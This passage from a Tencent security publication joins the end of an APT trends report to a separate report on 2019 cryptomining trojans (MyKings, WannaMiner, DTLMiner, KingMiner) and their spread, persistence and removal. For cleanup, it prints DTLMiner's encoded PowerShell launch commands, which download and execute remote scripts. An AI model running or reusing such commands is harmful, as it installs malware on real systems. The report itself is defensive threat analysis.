随着网络安全意识的提升以及网络安全培训的普及,普通低端的网络钓鱼类攻击可能越来越难以实现攻击的目的,漏洞对攻击成功率的影响可能会越来越突出,各个APT团队对漏洞的投入也会越来越大,这些漏洞可能包括操作系统漏洞,服务器漏洞,应用软件漏洞,物联网设备漏洞等。2019年Windows操作系统就爆出了多个RDP远程漏洞,而部分漏洞已经0day在野利用相当长一段时间了,可以预见未来会出现更多的远程类攻击漏洞,所有开放端口的服务都可能受到漏洞的威胁。

6.5  组织的归属难度加大

随着一些APT组织的武器库被泄露,以及越来越多的组织使用公开的武器库,或者利用开源的攻击工具进行改编,使得从武器上进行组织归属越来越难。而假旗活动的增多,也使得在TTPs上的归属也存在一定的难度。此外,还会出现更多的黑吃黑现象,导致基础设施的关联都存在错误的可能。除了这些原因外,某些具有强大背景的攻击组织,也往往会不断的更新其攻击武器库(如C&C服务器只用一次,某些特马只用一次等等),因此对组织本身的掌握上也存在很大的困难。如此多的因素导致组织归属可能会成为一大挑战。

6.6  基于IPv6的攻击带来的困境

2019年11月25日,欧洲网络协调核心RIPE NCC 宣布43 亿个 IPv4 地址已分配完毕,这意味着已经没有更多的 IPv4 地址可以分配给 ISP 和其他大型网络基础设施提供商,IPv4正式宣告耗尽。

73.jpg

图73:Nikolas Pediaditis宣布IPv4耗尽的电子邮件 

随着IPv4的耗尽,会有越来越多的攻击者使用IPv6来进行攻击。但是由于一些安全软件的更新迭代会存在时间的周期(如攻击的IP威胁情报库),会导致安全软件的防御能力出现一定的问题。因此如何预防基于IPv6的课题,也成为了摆在安全厂商和甲方安全人员头上的现实问题。

七、安全建议

我们建议国家重要机构、科研单位、重点企业参考以下几点防御专业黑客组织发起的APT攻击:

1. 通过官方渠道或者正规的软件分发渠道下载所需要的软件;

2. 谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作;

3.提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码;

4. 及时安装操作系统补丁和Office等重要软件的补丁;

5. 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯T-Sec终端安全管理系统(腾讯御点)。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险;

74.png

图74:使用腾讯T-Sec终端安全管理系统安装系统补丁 

6. 推荐政府机构、科研单位及重要企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)及时捕捉黑客攻击。腾讯T-Sec高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

75.png

图75:使用腾讯T-Sec高级威胁检测系统发现捕捉黑客攻击行为 

7. 推荐采用腾讯安全威胁情报系列产品和服务

SaaS形式自动化威胁情报查询产品“T-Sec-威胁情报云查服务”,满足对IP/Domain/文件等对象的威胁查询、SaaS形式威胁情报查询及溯源产品“T-Sec高级威胁追溯系统”。只需要打开浏览器便可查询各种威胁详情和恶意团伙背景等相关信息、私有化形式产品。

参考链接:https://cloud.tencent.com/product/tics

T-Sec威胁情报平台(TIP)是把腾讯安全威胁情报能力变成一套可本地部署的威胁情报管理平台,目的是帮助客户在内网/专网/私有云等环境实现威胁情报管理和查询。

T-Sec 高级威胁追溯系统,助力用户进行线索研判、攻击定性和关联分析,追溯威胁源头,有效预测威胁的发生并及时预警。

参考链接:https://cloud.tencent.com/product/atts

8. 推荐政企机构采用腾讯T-Sec 网络资产风险检测系统(腾讯御知)全面检测网络资产是否受安全漏洞影响。

腾讯T-Sec 网络资产风险检测系统(腾讯御知)是一款自动探测网络资产并识别其风险的产品。可全方位监控企业网站、云主机、小程序等资产存在的风险,包含弱口令检测、Web 漏洞扫描、违规敏感内容检测、网站篡改检测、挂马挖矿检测等多类资产风险。

76.png

图76:使用腾讯T-Sec网络资产风险检测系统(御知)检测是否存在资产风险

八、附录

 附录:参考链接

1、 https://www.kaspersky.com/blog/darkhotel-hackingteam/15090/

2、https://www.freebuf.com/news/72852.html

3、https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

4、https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/

5、https://twitter.com/cyberwar_15/status/1190461542711513089

6、https://www.nytimes.com/2019/08/28/us/politics/us-iran-cyber-attack.html

7、https://www.securitynewspaper.com/2019/07/15/new-york-power-blackout-did-iran-did-performed-a-counter-cyberattack/

8、https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/

9、https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims

10、https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/

11、https://www.altran.com/as-content/uploads/sites/7/2019/01/pr-altran-28-january-en.pdf

12、https://twitter.com/a_tweeter_user/status/1188811977851887616

13、https://indianexpress.com/article/india/not-only-kudankulam-isro-too-was-alerted-of-cyber-security-breach-6105184/

14、https://zerodium.com/program.html

15、https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/

16、https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、背景

2019年8月,国家发布支持深圳建设中国特色社会主义先行示范区的意见,其中提到,支持在深圳开展数字货币研究与移动支付等创新应用。业内人士认为,开展数字货币研究将发挥数字经济的积极作用。 

2009年比特币诞生,至今已经第十年,创建于2014年的门罗币也已经到了第5年。以比特币,门罗币为代表的数字加密货币近年来已逐渐为大众所熟知,不少人利用交易数字货币赚取收益。 

随着数字经济的蓬勃发展,由此带来的数字资产安全问题也不断出现,根据数字货币的基本原理:不依靠特定货币机构发行、依据特定算法、通过大量的计算产生,使得“挖矿”成为最基本的获取数字加密货币的方式。而想要通过“挖矿”获取更多的币,唯一的途径是提升算力,所以需要投入大量的资金用购买计算设备。 

而黑客总是希望不投入资金就获得大量回报,“控制其他人的计算机进行挖矿计算”的想法油然而生,这也就是“挖矿木马”的概念。“挖矿木马”的最早出现时间目前不能确定,但是开始大规模流行于2017年初。 

黑客入侵控制大量计算机并植入矿机程序后,利用计算机的CPU或GPU资源完成大量运算,从而获得数字加密货币。同时,黑产在暗网进行非法数据或数字武器售卖时大部分采用比特币作为交易货币,导致数字加密货币成为黑灰产业的流通媒介,也催生了挖矿产业的持续繁荣。从2017年爆发之后,挖矿木马逐渐成为网络世界主要的威胁之一。

挖矿进程CPU占用 

本文首先介绍以比特币价格变化曲线为时间轴,在该期间发生的重大安全事件,然后总结2019年挖矿木马的总体趋势以及技术特点,并给出了通用型和具有针对性的防御和处置建议,最后对挖矿木马的未来趋势作出预测。 

二、币价曲线与重大安全事件

比特币价格与安全事件

观察2017~2019年的比特币价格曲线和重大安全事件图,可以发现在此期间,“币价高位剧烈波动,安全事件层出不穷”,部分影响较大的攻击事件如下:

2.1  WannaCry

2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量企业的计算机。该蠕虫感染计算机后向计算机中植入敲诈者病毒,导致电脑大量文件被加密,然后向受害者索要比特币作为恢复文件的赎金。

2.2 第一次上涨

WannaCry蠕虫爆发后的半年时间内(即2017年5月至2017年12月),比特币价格呈爆发性增长,由1000美元/BTC上涨至17000美元/BTC。 

WannaCry之后的一段时间内,没有出现其他勒索病毒使用“永恒之蓝”漏洞大规模传播的情况,然而挖矿木马却看从中到了“商机”。2017年下半年开始陆续有利用“永恒之蓝”攻击的挖矿木马,首先被发现的是大型僵尸网络MyKings。

2.2.1 MyKings

Mykings僵尸网络是迄今为止发现的最复杂的僵尸网络之一,主要攻击特点为利用“永恒之蓝”漏洞和针对MsSQL,RDP,Telnet等服务进行密码爆破,然后在失陷主机植入挖矿模块,远程控制模块,并且利用扫描攻击模块进行蠕虫式传播。 

2017年4月之后,MyKings传播量开始出现爆发式增长,正是其利用“永恒之蓝”漏洞武器攻击所导致。通过在僵尸网络中安装门罗币挖矿机,利用服务器资源挖矿,MyKings的门罗币钱包已获得超过百万***的收益。

2.2.2 ZombieBoy

2017年12月腾讯御见威胁情报中心检测到一款挖矿木马,其PDB文件中发现了明文字符串“C:\Users\ZombieBoy\Documents\Visual Studio2017\Projects\nc\Release\nc.pdb”,在网上通过关键字“ZombieBoy”进行查找,我们发现了一款“永恒之蓝”漏洞利用工具,推测黑客将此工具改造后于传播挖矿木马。我们根据特征将其其命名为ZombieBoyMiner,御见后台统计数据显示,该木马在高峰时期感染超过7万台电脑。

漏洞利用工具ZombieBoy

2.3 波动下跌

ZombieBoyMiner出现时(2017年12月)正值比特币价格的最高峰,之后开始波动下跌过程。接着,2018年3月,另一个利用“永恒之蓝”漏洞大范围攻击的挖矿蠕虫病毒WannaMiner被发现了。

2.3.1   WannaMiner

WannaMiner木马将染毒机器构建成一个健壮的僵尸网络,并且支持内网自更新,最终目标为通过挖矿获利。由于其在内网传播过程中通过SMB进行内核攻击,可能造成企业内网大量机器出现蓝屏现象。根据统计数据,WannaMiner矿蠕虫感染量超过3万台。 

WannaMiner的攻击流程如下:

WannaMiner的攻击流程

2.3.2   BuleHero

2018年8月出现了“最强漏洞攻击“的挖矿蠕虫病毒BuleHero。根据御见威胁情报中心持续跟踪结果,除了“永恒之蓝”漏洞外,BuleHero使用了以下漏洞进行攻击:

LNK漏洞CVE-2017-8464

Tomcat任意文件上传漏洞CVE-2017-12615

Apache Struts2远程代码执行漏洞CVE-2017-5638

Weblogic反序列化任意代码执行漏洞CVE-2018-2628,CVE-2019-2725

Drupal远程代码执行漏洞CVE-2018-7600

Apache Solr 远程代码执行漏洞CVE-2019-0193

THinkphpV5漏洞CNDV-2018-24942 

除了以上漏洞之外,BuleHero的最新版本还使用了2019年9月20日浙江杭州警方公布的“PHPStudy“后门事件中披露的位于php_xmlrpc.dll模块中的漏洞。

 “PHPStudy“后门利用

2.3.3   DTLMiner

2018年12月爆发了DTLMiner(永恒之蓝下载器)挖矿木马。黑客通过入侵某公司服务器,修改某款软件的的升级配置文件,导致安装该软件的用户在升级时下载了木马文件。木马运行后又利用“永恒之蓝”漏洞在内网中快速传播,导致仅2个小时受攻击用户就高达10万。 

DTLMiner构建僵尸网络后,在中招机器植入门罗币矿机程序挖矿。由于DTLMiner前期在短时时间内感染量大量机器,后续又持续更新,加入了MsSQL爆破、IPC$爆破、RDP爆破和Lnk漏洞利用等攻击手法,使得其在2019年一直保持活跃。

升级组件漏洞被利用攻击声明

2.3.4   “匿影”

DTLMiner之后,2019年3月初出现了“匿影”挖矿木马。该木马大肆利用功能网盘和图床隐藏自己,并携带NSA武器库从而具备在局域网横向传播的能力。“匿影”所使用大量的公共服务如下:

 “匿影”使用的公共服务

2.4 第二次上涨

在“匿影”挖矿木马出现的同时,比特币价格重新恢复上涨。2019年3月至2019年6月,比特币价格由4000美元/BTC上涨至12000美元/BTC。

sodinokibi

2019年6月,在比特币价格再次回升到高点时,sodinokibi勒索病毒爆发。该勒索病毒首先出现于2019年4月底,早期使用web服务相关漏洞传播,与大名鼎鼎的GandCrab勒索病毒较为相似。此时GandCrab已宣布停止运营,sodinokibi几乎完全继承了GandCrab的传播渠道。 

6月左右,sodinokibi勒索病毒开始伪装成税务单位、司法机构,使用钓鱼欺诈邮件来传播,由于系统默认设置不显示文件扩展名,伪装成doc文档的EXE病毒常被错误判断为文档而双击打开。

伪装成文档的Sodinokib勒索病毒 

2019年6月之后,比特币价格开始缓慢下跌。在2019年下半年,也没有出现影响较大的,新的挖矿木马家族。

三、2019挖矿木马感染趋势

3.1 样本产量

根据腾讯安全御见威胁情报中心统计数据,2019年挖矿木马攻击呈“上升-下降-保持平稳”的趋势。数据显示,2019年上半年挖矿木马非常活跃,高峰时检出攻击样本超过10万个/日;5月之后攻击趋势有所减缓,下降到了6万个/日,之后保持平稳。总体来看,挖矿木马在主机和服务器上都保有较大规模的感染量,使得挖矿木马成为企业面临的最严重的安全威胁之一。

2019年挖矿木马日产量趋势

3.2 地区分布

从地区分布来看,2019年挖矿木马在全国各地均有分布,其中感染最严重的地区分别为广东省,浙江省,北京市,以及江苏省。

2019年感染挖矿木马区域分布

3.3 行业分布

从行业分布来看,2019年受挖矿木马影响最严重的行业分别为互联网,制造业,科研和技术服务以及房地产业。

2019年挖矿木马影响行业分布

3.4 活跃家族

2019年挖矿木马最活跃的三个家族分别为WannaMiner,MyKings,DTLMiner(永恒之蓝下载器木马)。其中MyKings是老牌的僵尸网络家族,而WannaMiner和DTLMiner分别在2018年初和年底出现。在2019年这几个家族都有超过2万用户的感染量,他们的共同特点为利用“永恒之蓝”漏洞进行蠕虫式传播,使用多种类的持久化攻击技术,难以被彻底清除。

2019年挖矿木马活跃TOP榜

3.5 主要入侵方式

2019年挖矿木马主要入侵方式前三名分别是漏洞攻击、弱口令爆破和借助僵尸网络。由于挖矿木马需要获取更多的计算资源,所以利用普遍存在的漏洞和弱口令,或者是控制大量机器的僵尸网络进行大规模传播成为挖矿木马的首选。

挖矿木马主要入侵方式

3.5.1  漏洞攻击类型

挖矿木马攻击时利用的漏洞最主要类型为Windows系统漏洞(“永恒之蓝”),其次是WebLogic相关组件漏洞,Apache相关组件漏洞。常用于攻击的包括以下CVE编号的漏洞:

MS17-010“永恒之蓝”CVE-2017-0143

Weblogic反序列化任意代码执行漏洞CVE-2017-10271,CVE-2018-2628,CVE-2019-2725

Apache Struts2远程代码执行漏洞CVE-2017-5638

Apache Solr 远程代码执行漏洞CVE-2019-0193

Apache Tomcat远程代码执行漏洞CVE-2017-12615

挖矿木马主要漏洞攻击类型

3.5.2  爆破攻击类型

挖矿木马主要的爆破攻击类型为SQL爆破(包括MsSQL、MySQL),其次是IPC$和SSH。由于部分IT管理人员缺乏安全意识,许多数据库和远程登录服务被设置为弱口令。SplashData公布的2019排名前五位的最差密码分别是“123456”、“123456789”、“qwerty”、“password”和“1234567”,这些密码也是黑客在爆破攻击时的首选。挖矿木马通过内置的包含大量简单密码的字典进行自动匹配,很容易破解此类弱口令并入侵系统。

挖矿木马主要爆破攻击类型

四、2019挖矿木马技术特点

4.1 传播特点

4.1.1   供应链感染

2018年底出现的DTLMiner是利用现有软件的升级功能进行木马分发,属于供应链感染的典型案例。黑客在后台配置文件中插入木马下载链接,导致软件在升级时下载木马文件。由于软件本身拥有巨大的用户量,导致木马在短时间内感染量大量的机器。

DTLMiner篡改的配置文件

4.1.2   跨平台攻击

挖矿木马经历了从控制普通电脑到以控制企业主机为主,从只控制Windows挖矿到混合感染多个平台的变化。2019年腾讯御见威胁情报中心发现了”Agwl“,“萝莉帮”,WannaMine,Satan等多个针对linux的挖矿木马。 

2019年3月,Satan病毒出现最新变种,该变种病毒针对Windows系统和Linux系统进行无差别攻击,然后在中招电脑中植入勒索病毒勒索比特币、同时植入挖矿木马挖矿门罗币。

Satan病毒跨平台攻击

我们发现黑产为了实现的利益最大化,还会将挖矿木马与勒索软件、远控后门、剪贴板大盗、DDOS等木马的打包进行混合攻击。以下列举2019年的7个流行家族及其在攻击中植入的病毒种类:

多种病毒组合攻击

4.1.3   社交网络

2019年12月御见威胁情报中心发现了通过社会工程骗术传播的“老虎”挖矿木马(LaofuMiner)。攻击者将远控木马程序伪装成“火爆新闻”、“色情内容”、“隐私资料”、“诈骗技巧”等文件名,通过社交网络发送到目标电脑,受害者双击查看文件立刻被安装“大灰狼”远控木马。然后攻击者通过远控木马控制中毒电脑下载挖矿木马,中毒电脑随即沦为矿工。 

用于钓鱼攻击的部分文件名如下:

LaofuMiner使用的钓鱼文件

4.1.4   VNC爆破

2019年3月,Phorpiex僵尸网络针对被广泛使用的远程管理工具“VNC”默认端口5900进行爆破攻击,在高价值服务器上下载运行GandCrab 5.2勒索病毒加密重要系统资料实施敲诈勒索;若攻破有数字货币交易的电脑,则运行数字货币钱包劫持木马抢钱;若被攻击的只是普通电脑则被植入门罗币挖矿木马,成为Phorpiex控制的矿工电脑。

Phorpiex针对VNC服务爆破

4.1.5   感染型病毒

2019年4月感染型病毒Sality被发现利用建立的P2P网络,传播以盗取、劫持虚拟币交易为目的的“剪切板大盗“木马。 

Sality可感染本地硬盘、可移动存储设备、远程共享目录下的可执行文件,同时会利用可移动、远程共享驱动器的自动播放功能进行感染,然后在中招系统下载并执行“剪切板大盗”木马。 

Sality修改可执行文件的入口点,以病毒代码替换原始文件代码,使得所有被感染程序启动时执行病毒功能:

Sality感染可执行文件

“剪切板大盗“木马通过剪切板内容中的字符格式特点判断以太币或比特币钱包地址,并将切板内容替换为指定钱包,若用户在此时粘贴并进行转账操作,数字资产便落入黑客的口袋:

“剪切板大盗“木马替换钱包地址

4.2 恶意代码执行

4.2.1   Powershell

2019年4月3日DTLMiner在Powershell中反射加载PE映像,达到 “无文件”形式执行挖矿程序。这种方法直接在Powershell.exe进程中运行恶意代码,注入“白进程”执行的方式可能造成难以检测和清除挖矿代码。这也是首次发现的,大规模利用“无文件”形式执行的挖矿木马。 

DTLMiner在感染系统上安装计划任务,反复下载和执行一段加密的Powershell脚本,在脚本代码中嵌入了一段Base64编码的字符$Code64,该段字符实际上是XMRIG挖矿程序的二进制数据。

Base64编码的XMRig二进制数据

Powershell首先将$Code64解码为Bytes格式,然后调用Invoke-ReflectivePEInjection函数在内存中反射PE注入执行挖矿程序。

DTLMiner反射注入执行挖矿程序

4.2.2   DLL侧加载

KingMiner最早于2018年6月中旬出现,是一种针对Windows服务器MSSQL进行爆破攻击的门罗币挖矿木马。攻击者采用多种逃避技术来绕过虚拟机环境和安全检测,导致一些反病毒引擎无法准确查杀。

未来逃避杀软检测,KingMiner启动挖矿木马时采用DLL侧加载(DLL Side-Loading)技术,也就是“白+黑”技术,利用正常的有数字签名的白文件来调用恶意DLL。其使用到的有微软系统文件“Credential BackupandRestore Wizard(凭据备份和还原向导)”和多个知名公司的数字签名的文件:

“GuangZhouKuGou Computer Technology Co.,Ltd.”

“GoogleInc”

“福建创意嘉和软件有限公司”

KingMiner利用的白文件签名

4.3 持久化攻击

4.3.1   计划任务

KingMiner使用RegisterTaskDefinition创建名为WindowsMonitor的计划任务,每15分钟执行一次Powershell脚本;或者安装在系统启动时执行的计划任务WindowsHelper,并在WindowsHelper中安装计划任务WindowsMonitor执行一次VBS脚本代码。

KingMiner安装计划任务

4.3.2   WMI计时器

KingMiner在WMI中创建为名为WindowsSystemUpdate_WMITimer的计时器,并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate_filter绑定到计时器。随着计时器触发,每15分钟执行一次VBS脚本代码。

KingMiner安装WMI计时器

4.3.3   阻断外部入侵

KingMiner判断计算机版本是否受CVE-2019-0708漏洞的影响,同时判断计算机是否安装指定的补丁kb4499175 kb4500331 KB4499149 KB4499180 KB4499164(这些补丁是微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。 

如果没有安装CVE-2019-0708补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,以此来来阻止其他木马进入系统,从而达到独占挖矿资源的目的。

KingMiner关闭RDP服务

五、挖矿木马防御和处置建议

5.1 防御方案

5.1.1   密码管理

服务器使用安全的密码策略,特别是SQL服务器的sa账号密码,切勿以下弱口令;

123456、admin、root、123456789、qwert、password、1234567、12345678、12345、lloveyou、111111、123123、888888、1234567890、88888888、666666等 

5.1.2   端口管理

服务器暂时关闭不必要的端口(如135、139、445、3389),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html; 

企业用户可部署腾讯御界高级威胁检测系统,发现、追踪黑客攻击线索。御界高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

腾讯御界高级威胁检测系统sqlserver爆破告警

5.1.3   Windows漏洞修复

根据微软公告及时修复以下Windows系统高危漏洞;

MS17-010永恒之蓝漏洞

XP、WindowsServer2003、win8等系统访问:

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

Office公式编辑器漏洞 CVE-2017-11882

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

Lnk漏洞CVE-2017-8464

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 

IE漏洞 CVE-2018-8174

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174

RDP服务漏洞 CVE-2019-0708

Windows XP、Windows2003:

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

Windows 7、Windows2008R2:

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175

Windows 2008:

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180

也可使用腾讯御点或腾讯电脑管家进行漏洞扫描和修复。

https://s.tencent.com/product/yd/index.html

腾讯御点修复系统漏洞

5.1.4   服务器组件漏洞修复

a. Oracle Weblogic任意代码执行漏洞

CVE-2017-10271

影响版本

OracleWebLogic Server10.3.6.0.0

OracleWebLogic Server12.1.3.0.0

OracleWebLogic Server12.2.1.1.0

OracleWebLogic Server12.2.1.2.0

官方补丁公告:

https://www.oracle.com/security-alerts/cpuoct2017.html

CVE-2018-2628

影响版本

Oracle WebLogic Server10.3.6.0

Oracle WebLogic Server12.2.1.2

Oracle WebLogic Server12.2.1.3

Oracle WebLogic Server12.1.3.0

官方补丁公告:

http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

CVE-2019-2725

影响版本

Oracle WebLogic Server10.3.6.0

Oracle WebLogic Server12.1.3.0

官方补丁公告:

https://www.oracle.com/security-alerts/alert-cve-2019-2725.html

b. Apache相关组件漏洞

Apache Struts2远程代码执行漏洞CVE-2017-5638

影响范围

Struts 2.3.5 – Struts 2.3.31

Struts 2.5 – Struts 2.5.10

官方补丁公告:

https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&isappinstalled=0

Apache Solr 远程代码执行漏洞CVE-2019-0193

受影响版本

Apache Solr < 8.2.0

官方补丁公告:

https://issues.apache.org/jira/browse/SOLR-13669

Apache Tomcat远程代码执行漏洞CVE-2017-12615

影响版本

Apache Tomcat 7.0.0-7.0.79

官方补丁公告:

http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81

也可使用腾讯安全研发的御知网络资产风险监测系统排查网络资产的安全风险,对企业的网络资产及各类应用的可用性、安全性与合规性等进行定期的安全扫描、持续性的风险预警和漏洞检测。(https://s.tencent.com/product/narms/index.html

腾讯御知检测Apache struts2漏洞

5.2 处置建议

如发现主机系统出现明显卡慢,或服务器出现进程长时间超过80%CPU占用的现象,则可能感染了挖矿木马。可按照以下步骤进行确认和移除操作。

5.2.1 感染确认

1) 个人用户

a.     通过Windows任务管理器(或PCHunter或Process Explorer)或Linux下使用命令ps -aux ,找到高CPU占用的进程及其文件。若文件在系统目录下,在另一台机器上找到同名的正常系统文件与可疑文件进行对比;若在某软件目录下,找到该软件的同名正常文件与可疑文件进行对比。

挖矿进程CPU占用

b.    使用PCHunter或Linux下使用命令netstat -tup 查找进程网络连接的IP及端口,特别是5559、7777、4444、13333等可疑远程端口连接。接着使用该IP地址进行域名反查,注意指向该IP的域名中是否包含“miner”,”pool”等字样。

若在以上a步骤中排除系统文件或正常软件文件,且该文件具有b中的可疑网络连接,则可能感染挖矿木马。

2)   企业用户

企业用户建议部署腾讯御界高级威胁检测系统,可识别挖矿过程中的通信协议,从网络流量中检测挖矿行为。

御界检测挖矿行为

5.2.2 病毒移除

确认感染挖矿木马后,可尝试按照以下步骤进行清除:

1)Windows系统

使用PCHunter或其他管理工具退出可疑进程,删除进程文件,并在启动项、服务、计划任务中找到启动该文件映像的项目并删除。

PCHunter删除挖矿木马启动项

2)Linux系统

下通过命令pkill -9退出进程;

删除进程文件,并检查crontab命令下显示的木马相关定时任务;

删除以下目录下木马相关定时任务;

/var/

spool/cron/

root/

/var/spool/cron/c

rontabs

删除以下目录下木马相关自启动项;

/etc/rcS.d/

/etc/rc.d/init.d/

企业用户可在服务器部署腾讯御点终端安全管理系统,对挖矿木马进行清理。

5.2.3 清理僵尸网络

1)MyKings

MyKings僵尸网络清理建议

排查数据库作业名称,清除包含恶意代码的作业;排查数据库存储过程,清理包含恶意代码的内容; 

由于MyKings最新版本还会感染“暗云“MBR、Rookit等顽固病毒,用户可使用电脑管家系统急救箱进行查杀清理,使用指南及下载链接:https://guanjia.qq.com/avast/283/index.html

电脑管家系统急救箱清理MBR和内核级病毒

2)WannaMiner

WannaMiner清理建议

3)DTLMiner(永恒之蓝下载器木马)

DTLMiner清理建议

删除随机名计划任务:“VDoaC” 、”hadpeRz\oABwX”、”lKNVFjCJm\oWuUXql”

DTLMiner随机名计划任务

启动程序分别为:

/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBWAEQAbwBhAEMAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0A**AdAByADIAcQAuAGMAbwBtA**AYwBvAG0ALwB2A**AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtA**ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApA**ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfA**AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"
/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBoAGEAZABwAGUAUgB6AFwAbwBBAEIAdwBYACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAdwBjAG4AYQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBzAF8AMgAwADEAOQAxADIAMgA3ACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0A**AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtA**AUwBlAGMAdQByAGkAdAB5A**AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMAA5AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="
/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEsATgBWAEYAagBDAEoAbQBcAG8AVwB1AFUAWABxAGwAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0A**AYQBtAHgAbgB5A**AYwBvAG0ALwB2A**AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtA**ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApA**ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfA**AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"

六、挖矿木马未来的趋势

6.1  “永恒之蓝“漏洞

